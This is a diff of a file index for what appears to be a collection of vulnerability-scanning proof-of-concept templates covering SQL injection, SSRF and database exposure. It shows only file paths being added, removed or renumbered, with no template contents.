./poc/sql/analytics-insights-a52a48fcebcdb3625a324cff9c9c4abe.yaml ./poc/sql/android-debug-database-exposed-312.yaml ./poc/sql/android-debug-database-exposed-313.yaml +./poc/sql/android-debug-database-exposed-314.yaml ./poc/sql/android-debug-database-exposed-315.yaml -./poc/sql/android-debug-database-exposed-316.yaml ./poc/sql/android-debug-database-exposed.yaml ./poc/sql/anfrageformular-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/animate-everything-6477bf18cad6c823db485408d49b337b.yaml @@ -90145,7 +90123,8 @@ ./poc/sql/apache-loadbalancer-364.yaml ./poc/sql/apache-loadbalancer-365.yaml ./poc/sql/apache-loadbalancer.yaml -./poc/sql/api-abuseipdb-384.yaml +./poc/sql/api-abuseipdb-385.yaml +./poc/sql/api-abuseipdb.yaml ./poc/sql/api-dbt.yaml ./poc/sql/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/sql/api2cart-bridge-connector-9310170fdba6634de0183ef1f76c24bb.yaml @@ -90409,6 +90388,7 @@ ./poc/sql/buddypress-media-09db3ed600715ed39882e0075ad496ac.yaml ./poc/sql/buddypress-sticky-post-65b7b523caeedbacbd14c75623fa6515.yaml ./poc/sql/buffer-my-post-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/buildbot-panel-803.yaml ./poc/sql/buildbot-panel.yaml ./poc/sql/buildbot-panel.yml ./poc/sql/builder-contact-05cefda973a9af46db8fb07d4529e095.yaml @@ -90494,7 +90474,7 @@ ./poc/sql/chamilo-lms-sqli-1.yaml ./poc/sql/chamilo-lms-sqli-2.yaml ./poc/sql/chamilo-lms-sqli-891.yaml -./poc/sql/chamilo-lms-sqli-892.yaml +./poc/sql/chamilo-lms-sqli.yaml ./poc/sql/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/sql/change-login-logo-4238ce6d433fb89e975842e8fdb72cad.yaml ./poc/sql/change-prices-with-time-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -90504,6 +90484,7 @@ ./poc/sql/changjet-tplus-keyinfolist-sqli.yaml ./poc/sql/chanjet-CRM-sqli.yaml ./poc/sql/chanjet-crm-get-usedspace-sql-injection.yaml +./poc/sql/chanjet-crm-sqli.yaml ./poc/sql/chanjetcrm-sqli.yaml ./poc/sql/chanjettplus-sqli.yaml ./poc/sql/charitable-9df7e0ba5fda4510a23ec4adbc13841f.yaml @@ -90691,10 +90672,11 @@ ./poc/sql/couchdb-admin-party.yaml ./poc/sql/couchdb-adminparty-1235.yaml ./poc/sql/couchdb-adminparty-1236.yaml +./poc/sql/couchdb-adminparty-1237.yaml ./poc/sql/couchdb-adminparty.yaml ./poc/sql/couchdb-cve-2017-12635.yml ./poc/sql/couchdb-detect.yaml -./poc/sql/couchdb-exposure-1238.yaml +./poc/sql/couchdb-exposure-1239.yaml ./poc/sql/couchdb-exposure-1240.yaml ./poc/sql/couchdb-exposure-1241.yaml ./poc/sql/couchdb-exposure.yaml @@ -90826,13 +90808,14 @@ ./poc/sql/date-time-picker-field-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/date-time-picker-field-f9e5579db8346e24e94a94b4128866ec.yaml ./poc/sql/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml -./poc/sql/db-backup-lfi-6774.yaml +./poc/sql/db-backup-lfi-6775.yaml ./poc/sql/db-backup-lfi-6776.yaml ./poc/sql/db-backup-lfi.yaml ./poc/sql/db-backup.yaml ./poc/sql/db-schema-1.yaml ./poc/sql/db-schema-2.yaml ./poc/sql/db-schema-3.yaml +./poc/sql/db-schema-6783.yaml ./poc/sql/db-schema-6784.yaml ./poc/sql/db-schema-6785.yaml ./poc/sql/dbapp-jumpserver-service-useradd.yaml @@ -90841,7 +90824,6 @@ ./poc/sql/dbeaver-credentials-6777.yaml ./poc/sql/dbeaver-credentials-6778.yaml ./poc/sql/dbeaver-credentials-6779.yaml -./poc/sql/dbeaver-credentials-6780.yaml ./poc/sql/dbeaver-credentials-6781.yaml ./poc/sql/dbeaver-credentials-6782.yaml ./poc/sql/dbeaver-data-sources.yaml @@ -90856,10 +90838,10 @@ ./poc/sql/debug-log-manager-df86fb073cfdbcf3c878e8167244dee2.yaml ./poc/sql/dedecms-guestbook-sqli.yaml ./poc/sql/dedecms-guestbook-sqli.yml +./poc/sql/dedecms-membergroup-sqli-6796.yaml ./poc/sql/dedecms-membergroup-sqli-6797.yaml ./poc/sql/dedecms-membergroup-sqli-6798.yaml ./poc/sql/dedecms-membergroup-sqli-6799.yaml -./poc/sql/dedecms-membergroup-sqli.yaml ./poc/sql/dedecms-membergroup-sqli.yml ./poc/sql/defender-security-2020b15b8eb9ba5370b2afa3c6dbea78.yaml ./poc/sql/defender-security-89eba353f6f79e2d842308338b651ddb.yaml @@ -90907,7 +90889,6 @@ ./poc/sql/doneren-met-mollie-5892523ec2265ec2c4db0a351f404d23.yaml ./poc/sql/donorbox-donation-form-7e3cdcd7322fdba36cae6661c4404f33.yaml ./poc/sql/dotnetcms-sqli-7089.yaml -./poc/sql/dotnetcms-sqli.yaml ./poc/sql/dotnetcms-sqli.yml ./poc/sql/download-from-files-a1fa06fbb5bc053d589b33ccdbbdc2f9.yaml ./poc/sql/download-manager-03951c916730f541db7606ebff038a6c.yaml @@ -90956,7 +90937,9 @@ ./poc/sql/dukapress-42d1930756a0a540db942aacdf5f0b12.yaml ./poc/sql/duomicms-sql-injection-7122.yaml ./poc/sql/duomicms-sql-injection-7123.yaml +./poc/sql/duomicms-sql-injection-7124.yaml ./poc/sql/duomicms-sql-injection-7125.yaml +./poc/sql/duomicms-sql-injection.yaml ./poc/sql/duomicms-sqli.yaml ./poc/sql/duomicms-sqli.yml ./poc/sql/duplicate-page-219a16f0f3edb724b96c66d462f64166.yaml @@ -91056,6 +91039,7 @@ ./poc/sql/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql/ecology-sqli2.yaml ./poc/sql/ecology-syncuserinfo-sqli-7177.yaml +./poc/sql/ecology-syncuserinfo-sqli.yaml ./poc/sql/ecology-syncuserinfo-sqli.yml ./poc/sql/ecology-v8-sqli.yaml ./poc/sql/ecology-v8-sqli.yml @@ -91087,6 +91071,7 @@ ./poc/sql/elasta-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/elasta-9437ebb08533440a4a517ccdbbdd6db9.yaml ./poc/sql/elasticsearch-sql-client-detect-7189.yaml +./poc/sql/elasticsearch-sql-client-detect-7190.yaml ./poc/sql/elasticsearch-sql-client-detect-7191.yaml ./poc/sql/elasticsearch-sql-client-detect-7192.yaml ./poc/sql/elation-6477bf18cad6c823db485408d49b337b.yaml @@ -91161,6 +91146,7 @@ ./poc/sql/ethereumico-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/ethpress-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/etouch-v2-sqli-7265.yaml +./poc/sql/etouch-v2-sqli-7266.yaml ./poc/sql/etouch-v2-sqli-7267.yaml ./poc/sql/etouch-v2-sqli-7268.yaml ./poc/sql/etouch-v2-sqli.yml @@ -91200,6 +91186,7 @@ ./poc/sql/export-to-text-862d66478661085dbcc88bd65de30940.yaml ./poc/sql/exposed-adb-7280.yaml ./poc/sql/exposed-adb-7281.yaml +./poc/sql/exposed-adb-7282.yaml ./poc/sql/exposed-adb.yaml ./poc/sql/exposed-mysql-initial-7321.yaml ./poc/sql/exposed-mysql-initial-7322.yaml @@ -91470,6 +91457,7 @@ ./poc/sql/glorious-services-support-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glorious-sites-installer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glossary-by-codeat-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/glpi-9.3.3-sql-injection.yaml ./poc/sql/gm-woo-product-list-widget-c7d55594227f574d6f5e336946adb772.yaml ./poc/sql/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/go-viral-6477bf18cad6c823db485408d49b337b.yaml @@ -91772,7 +91760,6 @@ ./poc/sql/kbslider-d1db2f87ba0712e1c037d7fa87dbf0bd.yaml ./poc/sql/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml ./poc/sql/kento-post-view-counter-a5fedfc9aea2a7db95d52ff7f7b738e8.yaml -./poc/sql/kevinlab-bems-sqli-8457.yaml ./poc/sql/kevinlab-bems-sqli-8458.yaml ./poc/sql/kevinlab-bems-sqli-8459.yaml ./poc/sql/kevinlab-bems-sqli-8460.yaml @@ -91921,7 +91908,7 @@ ./poc/sql/maxbuttons-a66a8a7e32b7fc1922165ddb61178156.yaml ./poc/sql/maz-loader-b1cca93f4b55112648ec98db79317e10.yaml ./poc/sql/mcms-list-do-sqli.yaml -./poc/sql/mdb-database-file-8796.yaml +./poc/sql/mdb-database-file-8795.yaml ./poc/sql/mdb-database-file.yaml ./poc/sql/mdc-private-message-4d8badd82549db37be67f8f9b51803eb.yaml ./poc/sql/media-download-6477bf18cad6c823db485408d49b337b.yaml @@ -91994,13 +91981,13 @@ ./poc/sql/moneymasters-02a4bc9438adbcdaa5664f021e38f12e.yaml ./poc/sql/moneytheme-0560e2fcc6071d361ddbd57a75ed8daf.yaml ./poc/sql/mongodb-detect-8919.yaml +./poc/sql/mongodb-detect-8920.yaml ./poc/sql/mongodb-detect-8921.yaml ./poc/sql/mongodb-detect.yaml ./poc/sql/mongodb-info-enum.yaml ./poc/sql/mongodb-ops-manager-8923.yaml ./poc/sql/mongodb-ops-manager-8924.yaml ./poc/sql/mongodb-ops-manager.yaml -./poc/sql/mongodb-unauth-8925.yaml ./poc/sql/mongodb-unauth-8926.yaml ./poc/sql/mongodb-unauth-8927.yaml ./poc/sql/mongodb-unauth-8928.yaml @@ -92156,7 +92143,7 @@ ./poc/sql/ocean-extra-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/odoo-database-manager-9202.yaml ./poc/sql/odoo-database-manager-9203.yaml -./poc/sql/odoo-database-manager-9205.yaml +./poc/sql/odoo-database-manager-9204.yaml ./poc/sql/odoo-database-manager.yaml ./poc/sql/off-canvas-sidebars-6ad11d341ff184481eedb5b9451b7483.yaml ./poc/sql/official-mailerlite-sign-up-forms-6707baefec25107b95f6524fdb5e747c.yaml @@ -92171,8 +92158,8 @@ ./poc/sql/ooorl-e3ffba36446f7dba2b794300461eb826.yaml ./poc/sql/open-external-links-in-a-new-window-65c98e7490918c36cf9db80ea2af7d28.yaml ./poc/sql/open-user-map-c2ea245347709cabfb352a7cf46c6db8.yaml -./poc/sql/openerp-database-9275.yaml ./poc/sql/openerp-database-9276.yaml +./poc/sql/openerp-database-9277.yaml ./poc/sql/openerp-database-9278.yaml ./poc/sql/openerp-database.yaml ./poc/sql/opening-hours-9fde58251e15e0ed15dbb0f57c33cf3e.yaml @@ -92187,14 +92174,11 @@ ./poc/sql/option-tree-ae18e342651d194dbc1007204717b118.yaml ./poc/sql/oracle-dbass-detect-9349.yaml ./poc/sql/oracle-dbass-detect-9350.yaml -./poc/sql/oracle-dbass-detect-9351.yaml -./poc/sql/oracle-dbass-detect.yaml ./poc/sql/oracle-dbcs-9352.yaml ./poc/sql/oracle-dbcs-9353.yaml ./poc/sql/oracle-dbcs-9354.yaml ./poc/sql/oracle-dbcs-9355.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9367.yaml -./poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9372.yaml @@ -92257,6 +92241,7 @@ ./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml ./poc/sql/paytium-dbb33df02ad82d104f52342b9d1314f4.yaml ./poc/sql/payu-india-dfb44dbc510f4bea6f74c6a6cb7e4f69.yaml +./poc/sql/pbootcms-database-file-download-9469.yaml ./poc/sql/pbootcms-database-file-download.yaml ./poc/sql/pbootcms-database-file-download.yml ./poc/sql/pdf-block-615a079e3552dbff38dc6dbbb7a3554e.yaml @@ -92311,7 +92296,6 @@ ./poc/sql/php-arcade-sqli.yaml ./poc/sql/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml ./poc/sql/php-everywhere-4214d6b172adab03dfd74f128fc5db19.yaml -./poc/sql/phpmyadmin-sql-9534.yaml ./poc/sql/phpmyadmin-sql-9535.yaml ./poc/sql/phpmyadmin-sql-9536.yaml ./poc/sql/phpmyadmin-sql.php-server-1.yaml @@ -92328,6 +92312,7 @@ ./poc/sql/pie-register-1e2d1b7026d2269694eb54e49db13853.yaml ./poc/sql/pie-register-51840cf3f730edb817a845513e726762.yaml ./poc/sql/pie-register-edb5da07e3386d078b8f2dfd3f0d66a1.yaml +./poc/sql/pikpikcusqli.yaml ./poc/sql/pinblocks-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/pinfinity-fcc940cb5d1edc9fa0dbfe45ecb68894.yaml ./poc/sql/piotnet-addons-for-elementor-pro-ff0dbabbd59c76a52ed540a831253c70.yaml @@ -92474,6 +92459,7 @@ ./poc/sql/qubely-c7df6e58b6d9b71a85834db950409116.yaml ./poc/sql/quick-adsense-0b4f61661156c48a0f3a621db781441d.yaml ./poc/sql/quick-affiliate-store-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/quick-cms-sqli.yaml ./poc/sql/quick-contact-form-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/quick-event-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/quick-pagepost-redirect-plugin-f2e831db47ee0091e76581fa4f070672.yaml @@ -92685,6 +92671,7 @@ ./poc/sql/seaCMS-sqli.yaml ./poc/sql/seacms-dmku-sqli.yaml ./poc/sql/seacms-sqli(1).yaml +./poc/sql/seacms-sqli-10103.yaml ./poc/sql/seacms-sqli.yml ./poc/sql/seacms-v101v11-comment-api-sqli.yaml ./poc/sql/seamless-donations-1c19a09a0db2341131db2ef5655ee08b.yaml @@ -92922,8 +92909,8 @@ ./poc/sql/springboot-h2-db-rce-10454.yaml ./poc/sql/springboot-h2-db-rce-10455.yaml ./poc/sql/springboot-h2-db-rce-10456.yaml -./poc/sql/springboot-h2-db-rce-10457.yaml ./poc/sql/springboot-h2-db-rce-10458.yaml +./poc/sql/springboot-h2-db-rce.yaml ./poc/sql/sprout-clients-503c868f614fe8f9ba65b257aadb9679.yaml ./poc/sql/sql-buddy.yaml ./poc/sql/sql-dump-1.yaml @@ -92958,7 +92945,6 @@ ./poc/sql/sql-server-report-viewer.yaml ./poc/sql/sql-server-reporting-10507.yaml ./poc/sql/sql-server-reporting-10508.yaml -./poc/sql/sql-server-reporting-10509.yaml ./poc/sql/sql-server-reporting-10510.yaml ./poc/sql/sql-server-reporting.yaml ./poc/sql/sql-shortcode-003f309c7f400c3e24a0ee3414677f42.yaml @@ -92979,7 +92965,6 @@ ./poc/sql/sqli2.yaml ./poc/sql/sqli_b_sleep.yaml ./poc/sql/sqli_error.yaml -./poc/sql/sqli_header-10504.yaml ./poc/sql/sqli_header.yaml ./poc/sql/sqliheader.yaml ./poc/sql/squaretype-091113ce7c8db36e32f582519aa46cca.yaml @@ -93066,6 +93051,7 @@ ./poc/sql/surveyfunnel-lite-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/surveys-6e9e122eb2e0c40dbc732f93cb774f75.yaml ./poc/sql/suspicious-sql-error-messages-10586.yaml +./poc/sql/suspicious-sql-error-messages.yaml ./poc/sql/sv-provenexpert-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/sv-tracking-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/svg-flags-lite-6477bf18cad6c823db485408d49b337b.yaml @@ -93078,8 +93064,7 @@ ./poc/sql/sydney-toolbox-6ebed23b763fe33f9cdffde1a1db7852.yaml ./poc/sql/symfony-database-config-10614.yaml ./poc/sql/symfony-database-config-10615.yaml -./poc/sql/symfony-database-config-10616.yaml -./poc/sql/symfony-database-config.yaml +./poc/sql/symfony-database-config-10617.yaml ./poc/sql/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/synotec-holdings-sql-injection.yaml ./poc/sql/syntaxhighlighter-6af94db0b5d5eb521508ffb351943a35.yaml @@ -93136,7 +93121,7 @@ ./poc/sql/thumbs-db-disclosure-10760.yaml ./poc/sql/thumbs-db-disclosure-10761.yaml ./poc/sql/thumbs-db-disclosure-10762.yaml -./poc/sql/thumbs-db-disclosure.yaml +./poc/sql/thumbs-db-disclosure-10763.yaml ./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml ./poc/sql/ti-woocommerce-wishlist-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/ti-woocommerce-wishlist-premium-693cf8c022651775af0db87e0b8f752d.yaml @@ -93144,8 +93129,8 @@ ./poc/sql/ticket-manager-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/sql/ticket-tailor-cd8902dc00bdb1b49cb56acbeb9ca9e4.yaml ./poc/sql/tidb-native-password.yaml +./poc/sql/tidb-unauth-10770.yaml ./poc/sql/tidb-unauth-10771.yaml -./poc/sql/tidb-unauth-10772.yaml ./poc/sql/tidb-unauth.yaml ./poc/sql/tidio-live-chat-5841edbae5f362f60a79d9cb73e8dd52.yaml ./poc/sql/tier-pricing-table-6477bf18cad6c823db485408d49b337b.yaml @@ -93221,8 +93206,9 @@ ./poc/sql/typofr-50c7a8d6d6928e0edbdd25d945accee8.yaml ./poc/sql/ubermenu-f5905ac46fc848b6b7db6aec714caee2.yaml ./poc/sql/ucmdb-default-login-10868.yaml -./poc/sql/ucmdb-default-login-10869.yaml ./poc/sql/ucmdb-default-login-10870.yaml +./poc/sql/ucmdb-default-login-10871.yaml +./poc/sql/ucmdb-default-login.yaml ./poc/sql/ucontext-8226db0cec7c7280f1367e900997219e.yaml ./poc/sql/ulisting-5dbc01f7b0f6c2a386a3664610ac3e23.yaml ./poc/sql/ulisting-7866bac5db8939bd8423ae7ad6c6a87c.yaml @@ -93268,6 +93254,7 @@ ./poc/sql/ultra-seven-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml ./poc/sql/unakit-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/unauth-psql.yaml +./poc/sql/unauthenticated-influxdb-10903.yaml ./poc/sql/unauthenticated-influxdb.yaml ./poc/sql/uncanny-automator-5390a51d3ea1667fc8bdb736afeae941.yaml ./poc/sql/uncode-lite-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml @@ -93673,6 +93660,7 @@ ./poc/sql/wordpress-db-backup-listing-11250.yaml ./poc/sql/wordpress-db-backup-listing.yaml ./poc/sql/wordpress-db-backup.yaml +./poc/sql/wordpress-db-repair-11252.yaml ./poc/sql/wordpress-db-repair-11253.yaml ./poc/sql/wordpress-db-repair-11254.yaml ./poc/sql/wordpress-db-repair-11255.yaml @@ -93702,7 +93690,6 @@ ./poc/sql/wordpress-woocommerce-sqli-11342.yaml ./poc/sql/wordpress-woocommerce-sqli-11343.yaml ./poc/sql/wordpress-woocommerce-sqli-11344.yaml -./poc/sql/wordpress-woocommerce-sqli-11345.yaml ./poc/sql/wordpress-woocommerce-sqli-2.yaml ./poc/sql/wordpress-woocommerce-sqli.yaml ./poc/sql/wordprezi-584db66faa21db5cdefc91cc7e54449b.yaml @@ -94179,7 +94166,6 @@ ./poc/sql/xcloner-backup-and-restore-af2601db04528a0b59f4305584ecbd5d.yaml ./poc/sql/xdcms-sql.yaml ./poc/sql/xdcms-sql.yml -./poc/sql/xdcms-sqli-11664.yaml ./poc/sql/xdcms-sqli-11665.yaml ./poc/sql/xdcms-sqli-11666.yaml ./poc/sql/xdcms-sqli-11667.yaml @@ -94221,6 +94207,7 @@ ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/sql/yongyou-U8-sqli.yaml ./poc/sql/yongyou-jdbcRead.yaml +./poc/sql/yongyou-jdbcread.yaml ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml ./poc/sql/yongyou-u8-oa-sqli-11746.yaml @@ -94273,7 +94260,6 @@ ./poc/sql/z-url-preview-cb5a7484dbd994ed6e7ac4e9b63a5368.yaml ./poc/sql/zabbix-cve-2016-10134-sqli.yml ./poc/sql/zarzadzanie_kontem-8ddb37c6c3ab472d4eda177c23c07e30.yaml -./poc/sql/zcms-v3-sqli-11773.yaml ./poc/sql/zcms-v3-sqli-11774.yaml ./poc/sql/zcms-v3-sqli-11775.yaml ./poc/sql/zcms-v3-sqli.yaml @@ -94307,11 +94293,11 @@ ./poc/sql_injection/74cms-show-sqli.yaml ./poc/sql_injection/74cms-sqli-1.yaml ./poc/sql_injection/74cms-sqli-1.yml -./poc/sql_injection/74cms-sqli-10.yaml ./poc/sql_injection/74cms-sqli-2.yaml ./poc/sql_injection/74cms-sqli-2.yml ./poc/sql_injection/74cms-sqli-8.yaml ./poc/sql_injection/74cms-sqli-9.yaml +./poc/sql_injection/74cms-sqli.yaml ./poc/sql_injection/74cms-sqli.yml ./poc/sql_injection/74cms_V3-plusa-sqli.yaml ./poc/sql_injection/74cms_v4-register-sqli.yaml @@ -94566,9 +94552,10 @@ ./poc/sql_injection/chamilo-lms-sqli-1.yaml ./poc/sql_injection/chamilo-lms-sqli-2.yaml ./poc/sql_injection/chamilo-lms-sqli-891.yaml -./poc/sql_injection/chamilo-lms-sqli-892.yaml +./poc/sql_injection/chamilo-lms-sqli.yaml ./poc/sql_injection/changjet-tplus-keyinfolist-sqli.yaml ./poc/sql_injection/chanjet-CRM-sqli.yaml +./poc/sql_injection/chanjet-crm-sqli.yaml ./poc/sql_injection/chanjetcrm-sqli.yaml ./poc/sql_injection/chanjettplus-sqli.yaml ./poc/sql_injection/cmseasy-aid-sqli.yaml @@ -94578,10 +94565,10 @@ ./poc/sql_injection/dahua-wpms-searchjson-sqli .yaml ./poc/sql_injection/dedecms-guestbook-sqli.yaml ./poc/sql_injection/dedecms-guestbook-sqli.yml +./poc/sql_injection/dedecms-membergroup-sqli-6796.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6797.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6798.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6799.yaml -./poc/sql_injection/dedecms-membergroup-sqli.yaml ./poc/sql_injection/dedecms-membergroup-sqli.yml ./poc/sql_injection/discuz-sqli-my.yaml ./poc/sql_injection/discuz-sqli-nds_up_ques.yaml @@ -94589,7 +94576,6 @@ ./poc/sql_injection/discuz-v72-sqli.yaml ./poc/sql_injection/discuz-v72-sqli.yml ./poc/sql_injection/dotnetcms-sqli-7089.yaml -./poc/sql_injection/dotnetcms-sqli.yaml ./poc/sql_injection/dotnetcms-sqli.yml ./poc/sql_injection/drupal-cve-2014-3704-sqli.yml ./poc/sql_injection/duomicms-sqli.yaml @@ -94606,6 +94592,7 @@ ./poc/sql_injection/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql_injection/ecology-sqli2.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml +./poc/sql_injection/ecology-syncuserinfo-sqli.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli.yml ./poc/sql_injection/ecology-v8-sqli.yaml ./poc/sql_injection/ecology-v8-sqli.yml @@ -94620,6 +94607,7 @@ ./poc/sql_injection/erensoft-sqli.yaml ./poc/sql_injection/errorbased_sqli.yaml ./poc/sql_injection/etouch-v2-sqli-7265.yaml +./poc/sql_injection/etouch-v2-sqli-7266.yaml ./poc/sql_injection/etouch-v2-sqli-7267.yaml ./poc/sql_injection/etouch-v2-sqli-7268.yaml ./poc/sql_injection/etouch-v2-sqli.yml @@ -94676,7 +94664,6 @@ ./poc/sql_injection/joomla-sqli-hdwplayer.yaml ./poc/sql_injection/joomla-sqli-vnmshop.yaml ./poc/sql_injection/joomla-sqli-weblinks_categories.yaml -./poc/sql_injection/kevinlab-bems-sqli-8457.yaml ./poc/sql_injection/kevinlab-bems-sqli-8458.yaml ./poc/sql_injection/kevinlab-bems-sqli-8459.yaml ./poc/sql_injection/kevinlab-bems-sqli-8460.yaml @@ -94708,12 +94695,14 @@ ./poc/sql_injection/qianxin-360-tianqing-rptsvcsyncpoint-sqli.yaml ./poc/sql_injection/qibocms-sqli.yaml ./poc/sql_injection/qibocms-sqli.yml +./poc/sql_injection/quick-cms-sqli.yaml ./poc/sql_injection/realor-appdel-sqli.yaml ./poc/sql_injection/realor-appsave-sqli-rce.yaml ./poc/sql_injection/realor_tianyi_avs_demo_sql_injection.yaml ./poc/sql_injection/seaCMS-sqli.yaml ./poc/sql_injection/seacms-dmku-sqli.yaml ./poc/sql_injection/seacms-sqli(1).yaml +./poc/sql_injection/seacms-sqli-10103.yaml ./poc/sql_injection/seacms-sqli.yml ./poc/sql_injection/seacms-v101v11-comment-api-sqli.yaml ./poc/sql_injection/seeyon-wooyun-2015-0108235-sqli.yaml @@ -94733,10 +94722,10 @@ ./poc/sql_injection/sqli-symfony.yaml ./poc/sql_injection/sqli-vuln-params-deep.yaml ./poc/sql_injection/sqli-vuln-params.yaml +./poc/sql_injection/sqli.yaml ./poc/sql_injection/sqli2.yaml ./poc/sql_injection/sqli_b_sleep.yaml ./poc/sql_injection/sqli_error.yaml -./poc/sql_injection/sqli_header-10504.yaml ./poc/sql_injection/sqli_header.yaml ./poc/sql_injection/sqliheader.yaml ./poc/sql_injection/stackposts-sqli.yaml @@ -94793,7 +94782,6 @@ ./poc/sql_injection/wordpress-woocommerce-sqli-11342.yaml ./poc/sql_injection/wordpress-woocommerce-sqli-11343.yaml ./poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml -./poc/sql_injection/wordpress-woocommerce-sqli-11345.yaml ./poc/sql_injection/wordpress-woocommerce-sqli-2.yaml ./poc/sql_injection/wordpress-woocommerce-sqli.yaml ./poc/sql_injection/wp-advanced-search-sqli.yaml @@ -94805,7 +94793,6 @@ ./poc/sql_injection/wuzhicms-sqli-11659.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yml -./poc/sql_injection/xdcms-sqli-11664.yaml ./poc/sql_injection/xdcms-sqli-11665.yaml ./poc/sql_injection/xdcms-sqli-11666.yaml ./poc/sql_injection/xdcms-sqli-11667.yaml @@ -94848,7 +94835,6 @@ ./poc/sql_injection/yungoucms-sqli.yaml ./poc/sql_injection/yungoucms-sqli.yml ./poc/sql_injection/zabbix-cve-2016-10134-sqli.yml -./poc/sql_injection/zcms-v3-sqli-11773.yaml ./poc/sql_injection/zcms-v3-sqli-11774.yaml ./poc/sql_injection/zcms-v3-sqli-11775.yaml ./poc/sql_injection/zcms-v3-sqli.yaml @@ -95064,11 +95050,12 @@ ./poc/ssrf/blind-ssrf.yaml ./poc/ssrf/blind_ssrf.yaml ./poc/ssrf/cloudflare-image-ssrf-1020.yaml +./poc/ssrf/cloudflare-image-ssrf-1021.yaml ./poc/ssrf/cloudflare-image-ssrf-1022.yaml ./poc/ssrf/cloudflare-image-ssrf-1023.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1190.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1191.yaml -./poc/ssrf/confluence-ssrf-sharelinks-1193.yaml +./poc/ssrf/confluence-ssrf-sharelinks-1192.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1194.yaml ./poc/ssrf/custom-microsoft-ssrf-detect.yaml ./poc/ssrf/custom-weblogic-SSRF-detect.yaml @@ -95081,6 +95068,7 @@ ./poc/ssrf/gitlab-ssrf-cve-2021-22214.yml ./poc/ssrf/hasura-graphql-ssrf-7903.yaml ./poc/ssrf/hasura-graphql-ssrf-7904.yaml +./poc/ssrf/hasura-graphql-ssrf-7905.yaml ./poc/ssrf/hasura-graphql-ssrf-7906.yaml ./poc/ssrf/hasura-graphql-ssrf.yaml ./poc/ssrf/header-blind-ssrf.yaml @@ -95105,7 +95093,7 @@ ./poc/ssrf/microstrategy-ssrf-8861.yaml ./poc/ssrf/microstrategy-ssrf.yaml ./poc/ssrf/office-webapps-ssrf.yaml -./poc/ssrf/openbmcs-ssrf-9261.yaml +./poc/ssrf/openbmcs-ssrf.yaml ./poc/ssrf/openfire-cve-2019-18394-ssrf.yml ./poc/ssrf/poc-yaml-vmware-vcenter-ssrf.yaml ./poc/ssrf/request-backets-ssrf.yaml @@ -95138,14 +95126,13 @@ ./poc/ssrf/umbraco-base-ssrf-10882.yaml ./poc/ssrf/umbraco-base-ssrf-2.yaml ./poc/ssrf/umbraco-base-ssrf-3.yaml -./poc/ssrf/umbraco-base-ssrf.yaml ./poc/ssrf/vmware-vcenter-ssrf-11051.yaml ./poc/ssrf/vmware-vcenter-ssrf-11052.yaml ./poc/ssrf/vmware-vcenter-ssrf-11053.yaml ./poc/ssrf/vmware-vrealize-cve-2021-21975-ssrf.yml +./poc/ssrf/w3c-total-cache-ssrf-11077.yaml ./poc/ssrf/w3c-total-cache-ssrf-11078.yaml ./poc/ssrf/w3c-total-cache-ssrf-11079.yaml -./poc/ssrf/w3c-total-cache-ssrf-11080.yaml ./poc/ssrf/w3c-total-cache-ssrf-11081.yaml ./poc/ssrf/weblogic-ssrf.yaml ./poc/ssrf/weblogic-ssrf.yml @@ -95158,6 +95145,7 @@ ./poc/ssrf/wp-multiple-theme-ssrf-11510.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11511.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11512.yaml +./poc/ssrf/wp-multiple-theme-ssrf-11513.yaml 